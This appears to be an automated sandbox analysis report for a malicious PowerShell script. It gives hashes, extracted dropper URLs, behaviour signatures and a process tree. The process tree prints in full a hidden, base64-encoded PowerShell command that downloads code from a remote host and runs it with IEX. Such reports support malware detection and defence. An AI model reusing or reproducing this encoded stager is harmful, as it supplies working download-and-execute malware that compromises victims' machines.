0143f78145b35e379b67b4d459ca00236e62ef689cc58200029c9d76b506d8be

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2024, 13:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0143f78145b35e379b67b4d459ca00236e62ef689cc58200029c9d76b506d8be.ps1
Size

1KB
MD5

9b1de1218bf55153373ce1bad1ed493f
SHA1

6d669e1273a2fbb6da7d4789b3a0cdf9734b97eb
SHA256

0143f78145b35e379b67b4d459ca00236e62ef689cc58200029c9d76b506d8be
SHA512

8e67dc6ecbfb399ee7fcae71048e969879d9fe70f0177f484be4a45a32af8d04738353dec7748fdf402f16ba901ff49a8990fba697d522e01c55286883a7144b

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.168.30.169:8080/qIniF4XWYQOweD/ZqVje5bZej

ps1.dropper

http://192.168.30.169:8080/qIniF4XWYQOweD

Signatures

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3488	powershell.exe
3488	powershell.exe
4748	powershell.exe
4748	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3488 wrote to memory of 4748	3488	powershell.exe	89
PID 3488 wrote to memory of 4748	3488	powershell.exe	89

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\0143f78145b35e379b67b4d459ca00236e62ef689cc58200029c9d76b506d8be.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB5AEEAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAeQBBAG4AdQBsAGwAKQB7ACQAeQBBAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB5AEEAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AH0AOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAzADAALgAxADYAOQA6ADgAMAA4ADAALwBxAEkAbgBpAEYANABYAFcAWQBRAE8AdwBlAEQALwBaAHEAVgBqAGUANQBiAFoAZQBqACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMwAwAC4AMQA2ADkAOgA4ADAAOAAwAC8AcQBJAG4AaQBGADQAWABXAFkAUQBPAHcAZQBEACcAKQApADsA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1elwig2.oip.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3488-25-0x000001F9C4C00000-0x000001F9C4C10000-memory.dmp

Filesize
64KB

Download
memory/3488-10-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download
memory/3488-37-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download
memory/3488-5-0x000001F9C4B60000-0x000001F9C4B82000-memory.dmp

Filesize
136KB

Download
memory/3488-24-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download
memory/3488-12-0x000001F9C4C00000-0x000001F9C4C10000-memory.dmp

Filesize
64KB

Download
memory/3488-26-0x000001F9C4C00000-0x000001F9C4C10000-memory.dmp

Filesize
64KB

Download
memory/3488-11-0x000001F9C4C00000-0x000001F9C4C10000-memory.dmp

Filesize
64KB

Download
memory/4748-27-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download
memory/4748-29-0x0000019BF2CD0000-0x0000019BF2CE0000-memory.dmp

Filesize
64KB

Download
memory/4748-30-0x0000019BF2CD0000-0x0000019BF2CE0000-memory.dmp

Filesize
64KB

Download
memory/4748-33-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download
memory/4748-28-0x0000019BF2CD0000-0x0000019BF2CE0000-memory.dmp

Filesize
64KB

Download
memory/4748-23-0x0000019BF2CD0000-0x0000019BF2CE0000-memory.dmp

Filesize
64KB

Download
memory/4748-22-0x00007FFD60BF0000-0x00007FFD616B1000-memory.dmp

Filesize
10.8MB

Download